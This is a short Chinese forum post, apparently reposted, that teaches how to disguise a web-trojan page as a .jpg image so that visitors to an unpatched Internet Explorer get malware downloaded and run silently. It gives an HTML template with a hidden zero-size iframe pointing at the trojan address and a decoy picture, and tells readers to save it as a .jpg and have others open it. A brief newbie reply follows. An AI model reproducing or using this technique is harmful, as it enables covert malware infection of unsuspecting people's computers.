信息来源：网络

特点：1 针对任何没有打过补丁的IE版本都有效！  
2 木马下载过程中防火墙不会做任何反应！  
3 木马地址以jpg为后缀名。列如 http://xxx.xxx.xxx.xxx/003.jpg　 和一般的图片地址无任何俩样！打开地址后在浏览器上会和正常情况下一样出现图片！但木马却已经在后台下载并在下载完成后自动执行！具有很强的迷惑性！  


一般来说，我们做出来的网页木马地址都是以 htm 或html 结尾！那么我们怎么修改呢？很简单！  
不知道大家知道不知道。IE有一个很小的BUG。即只要网站文件里有html码它就会执行，并不理会文件后缀名是什么。  

于是我们可以这么来修改网页木马的后缀名，其实说准确一点并不是修改点网页木马的地址后缀名，是利用一个图片地址来打开这个网页木马！  

打开记事本写入如下一段代码：  
<html>  
<iframe src="IE6。0网页木马地址" width="0" height="0" frameborder="0"></iframe>  
<center><img src="图片地址"></center>  
</html>  
然后将其另存为XXX.jpg 。  

剩下的工作就是将这个XXX.jpg图片格式的文件上传的你的空间，给出相对路径让别人访问了！  

别人在访问这个XXX.jpg文件时。。浏览器会将文件内的html码执行，根据代码的内容。你的网页木马地址会作为隐藏窗口被打开。。另外那个图片也会出现在对方所打开的网页上

不错，估计我能长点见识了！可惜偶是菜鸟，不懂啊 [s:35]